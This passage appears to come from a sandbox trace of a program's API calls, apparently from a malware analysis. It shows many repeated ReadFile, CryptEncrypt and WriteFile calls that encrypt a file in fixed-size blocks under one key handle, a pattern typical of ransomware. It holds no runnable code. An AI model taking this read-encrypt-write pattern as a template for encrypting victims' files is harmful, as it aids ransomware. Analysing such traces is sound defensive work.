lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.574] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.574] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.574] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.574] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.575] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.575] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.575] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.575] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.575] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.575] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.576] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.576] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.576] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.576] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.576] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.576] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.577] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.577] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.577] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.577] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.577] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.577] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.577] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.577] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.577] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.577] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.578] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.578] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.578] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.578] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.578] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.578] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.578] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.579] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.579] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.579] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.579] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.580] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.580] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.580] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.580] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.580] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.580] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.580] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.580] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.580] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.580] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.580] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: 